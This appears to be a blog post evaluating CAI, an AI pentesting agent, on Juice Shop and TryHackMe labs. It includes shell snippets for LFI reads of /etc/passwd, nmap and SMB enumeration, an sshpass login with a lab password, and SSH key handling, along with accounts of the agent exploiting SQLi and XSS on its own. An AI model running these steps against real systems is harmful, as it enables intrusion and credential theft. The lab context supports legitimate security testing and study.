Pentest with AI agents, experiment with CAI

11:29
22.10.2025
InfoSec_razbor

Hello tekkix!

AI agents are being talked about everywhere right now, from articles to technical reports. But theory is one thing, and practice is another. So I decided to run a small experiment: take the new CAI tool and see whether it can handle popular pentesting training tasks.

In this article, I’ll talk about my small test of the open-source project CAI (Cybersecurity AI) from Alias Robotics, announced on May 28, 2025.

AI agent analyzes network traffic as part of a pentest

In short, CAI is an open-source platform positioned as an AI assistant for discovering vulnerabilities and performing offensive (and defensive) security tasks. It comes with multi-agent orchestration, an extensive toolkit, and support for local models.

Installation was almost trouble-free. I only had to struggle a bit with proxy configuration (sanctions restrictions have their impact) and with setting up OpenAI tokens: I topped up $5 and used the gpt-3.5-turbo model, since it used tokens much more economically than gpt-4o-mini.
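For reference, the environment setup can be sketched roughly like this. It is a minimal sketch, not my exact configuration: the proxy address and the API key are placeholders, and CAI_MODEL is an assumed variable name that should be checked against the CAI documentation. HTTPS_PROXY and OPENAI_API_KEY are the conventional variables read by most HTTP clients and by the OpenAI client.

```shell
# Proxy for outbound API calls; the address is a placeholder, not a real endpoint.
export HTTPS_PROXY="http://127.0.0.1:3128"
export HTTP_PROXY="$HTTPS_PROXY"

# API key read by the OpenAI client; replace the placeholder with your own token.
export OPENAI_API_KEY="sk-REPLACE_ME"

# Model selection; CAI_MODEL is an assumed variable name, verify it in the CAI docs.
export CAI_MODEL="gpt-3.5-turbo"
```

Keeping these in a file that is sourced before launching the agent avoids retyping them after every restart.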

To test its capabilities, I chose two scenarios: OWASP Juice Shop and several CTFs on TryHackMe.

On Juice Shop, I tested CAI against an application deliberately filled with vulnerabilities. The agent quickly scanned the accessible pages, automatically found a SQL injection in the search parameters, and used it to bypass authentication and reach the admin panel. It also pointed out XSS vulnerabilities in the feedback form and even suggested working payloads, and it managed to extract user lists and plain-text passwords from the database. The scenario wasn’t complex, and here CAI proved to be a handy assistant for web pentesting, taking over the routine search for SQLi and XSS.

Visualization of CAI operation in automatic vulnerability scanning

The next test was on TryHackMe, where I tried three CTFs: Offensive Security Intro, Basic Pentesting and Mr Robot CTF.

In Offensive Security Intro, the goal was to gain access to internal web application files and find hidden keys. CAI started with reconnaissance: it scanned ports with nmap and discovered a web server on port 80 hosting an application called “Bank”. The agent then spotted a parameter vulnerable to Local File Inclusion and used it to read the contents of /etc/passwd, then traversed /home/ and /var/www/html/. Everything went quite smoothly, and CAI again completed the task fully autonomously, from detecting the LFI to retrieving the required files.
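To make the LFI step concrete, here is a minimal sketch of what such a request looks like. The parameter name page and the number of ../ segments are hypothetical, since the article does not record the real ones, and the helper names are mine, not CAI's.

```shell
# Build a URL that asks a vulnerable include parameter for a local file.
# "page" is a hypothetical parameter name; the depth of ../ is a guess that
# usually has to be tuned per target.
lfi_url() {
    base_url=$1    # e.g. http://<target-ip>/index.php
    file_path=$2   # absolute path on the target, e.g. /etc/passwd
    printf '%s?page=../../../..%s\n' "$base_url" "$file_path"
}

# Fetch the file through the vulnerable parameter (lab targets only).
lfi_read() {
    curl -s --max-time 10 "$(lfi_url "$1" "$2")"
}
```

Calling lfi_read with the lab host's URL and /etc/passwd would return the file contents if the parameter is indeed injectable.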

Scheme of interaction between multiple AI agents during a penetration test

The next CTF was Basic Pentesting, where the goal was to gain system access via weak credentials.

CAI started with basic reconnaissance: it ran ping and nmap -sV -A. The host was alive. Apache was running on port 80 (the main page had a hint in an HTML comment: “Check our dev note section…”), Samba on 139/445, Tomcat 9.0.7 on port 8080, and AJP on 8009.
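The reconnaissance step above can be sketched as a small wrapper. The function names, the DRY_RUN switch, and the output file name are my own illustration, not something CAI generates; only ping and nmap -sV -A come from the actual run.

```shell
# Print the command in dry-run mode, otherwise execute it.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# Basic reconnaissance: liveness check, then service and version detection.
recon() {
    target=$1
    run ping -c 3 "$target" || echo "no ICMP reply from $target" >&2
    # -sV: probe service versions; -A: OS detection, default scripts, traceroute
    # -oN: save the normal-format report for later reference
    run nmap -sV -A -oN "nmap_${target}.txt" "$target"
}
```

Running it with DRY_RUN=1 only prints the commands, which is handy for checking what would be launched before pointing it at a lab host.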

Then I launched a set of commands in one script: checking common paths, directory brute-forcing, and basic SMB enumeration.

Pentest panel interface with integrated AI for hacking a test network

CAI discovered /development/ and, inside it, dev.txt. It also checked Tomcat’s /manager/html (which responded with 401) and gathered SMB information without smbclient. At this stage, it highlighted two important hints: first, SMB is indeed configured and offers an attack path; second, Struts 2.5.12 is mentioned, with Tomcat running on port 8080.
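A script of this kind might look roughly like the following. This is a sketch under assumptions rather than the exact script from my run: the list of probed paths, the wordlist location (the Kali default), and the choice of nmap NSE scripts for SMB are illustrative.

```shell
# Map an HTTP status code to a short note for the report.
classify_status() {
    case "$1" in
        200) echo "found" ;;
        301|302) echo "redirect" ;;
        401) echo "auth required" ;;
        403) echo "forbidden" ;;
        *) echo "not available" ;;
    esac
}

# Probe a few common paths and print "path code note" for each.
check_paths() {
    base_url=$1
    for path in /development/ /manager/html /robots.txt; do
        code=$(curl -s -o /dev/null --max-time 10 -w '%{http_code}' "${base_url}${path}")
        echo "$path $code $(classify_status "$code")"
    done
}

# Full pass against one lab host: paths, directory brute force, SMB enumeration.
enumerate() {
    target=$1
    check_paths "http://${target}"
    check_paths "http://${target}:8080"
    # Wordlist path is the Kali default; adjust if yours lives elsewhere.
    gobuster dir -u "http://${target}" -w /usr/share/wordlists/dirb/common.txt
    # SMB shares and users via nmap NSE scripts, no smbclient needed.
    nmap -p 139,445 --script smb-enum-shares,smb-enum-users "$target"
}
```

With this mapping, the 401 from /manager/html shows up as "auth required", which is a useful signal on its own: the manager application exists and is just waiting for credentials.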

Graphs and metrics of AI agent efficiency in the CAI experiment

From there, everything followed the “classic” path for this room: SMB → users → password → SSH. First I pulled everything from /development/, which surfaced hints about the users jan and kay. The file j.txt directly pointed to a weak password for J. For this room, jan’s password is usually armando.

I tried connecting interactively with ssh jan@<target-ip> (password: armando). As soon as the password was entered, CAI froze and stopped responding (even Ctrl+C didn’t help), so I had to restart. On the next run, I went with a more reliable, non-interactive method:

sshpass -p "armando" ssh -o StrictHostKeyChecking=no jan@<target-ip> "whoami && id && hostname"

This way, CAI immediately executed the command as jan without manual input, and I had SSH access as jan@<target-ip> ✅.

Network map created by artificial intelligence during an attack simulation

In this room, the next goal is to reach the second user kay and extract the final key.

Process of bypassing security systems by the AI agent in a controlled environment

For this, I used an RSA key. Copying the key output into a file with nano inside CAI turned out to be a bad idea, because nano is interactive and often freezes the session. The solution was simple: do everything non-interactively in one command (script). After that, the key was saved, I removed the passphrase (via ssh-keygen -p), and connected as kay.
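The non-interactive approach can be sketched as follows. The function names and file names are hypothetical, the key body and passphrase are placeholders, and the sketch assumes the passphrase is already known, since ssh-keygen -p needs the old one to remove it.

```shell
# Write key material from stdin to a file with permissions ssh accepts.
save_key() {
    key_file=$1
    # Subshell keeps the restrictive umask from leaking into the caller.
    ( umask 077; cat > "$key_file" )
    chmod 600 "$key_file"
}

# Remove the passphrase in place; the old passphrase must already be known.
strip_passphrase() {
    key_file=$1
    old_pass=$2
    ssh-keygen -p -P "$old_pass" -N "" -f "$key_file"
}

# Usage sketch (placeholders, not values from the room):
#   save_key ./kay_id_rsa <<'EOF'
#   -----BEGIN RSA PRIVATE KEY-----
#   ...
#   -----END RSA PRIVATE KEY-----
#   EOF
#   strip_passphrase ./kay_id_rsa '<known-passphrase>'
#   ssh -i ./kay_id_rsa -o StrictHostKeyChecking=no kay@<target-ip> 'whoami && id'
```

Feeding the key through a heredoc means no editor is ever opened, so there is nothing for the agent's terminal to hang on.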

The final key was extracted. Overall, this scenario lends itself well to automation: password brute-forcing, SSH handling, and subsequent key use can all be integrated into CAI easily.

Moment when the AI detects a critical vulnerability in the test

The final challenge was the Mr Robot CTF, where the goal was to find three keys.

During reconnaissance, CAI found a WordPress site and managed to log in with the credentials elliot / ER28-0652. The first key was extracted directly through the web interface, and the agent handled this task without issues.

Teamwork of multiple AI agents in a cybersecurity lab

However, the second and third keys were located deeper, in the file system (/home/elliot/ and /root/), and retrieving them required a reverse shell and subsequent privilege escalation to root.

Here CAI was out of its depth. After several attempts, it became clear that CAI could not automatically upload a PHP reverse shell, start a listener, and escalate privileges to root. Such steps still require a human pentester or integration with full exploitation frameworks.

This experience clearly showed the limits of CAI’s capabilities. Such minimal tests, of course, do not support definitive conclusions, but they give a general sense of what this product is and where it fits. Replacing tools like Burp Suite is out of the question for now. Nevertheless, CAI left an intriguing impression: it is convenient as an “assistant” for reconnaissance and simple attacks, and I will definitely continue testing it. For me personally, though, it remains more of an experiment than a tool for everyday work.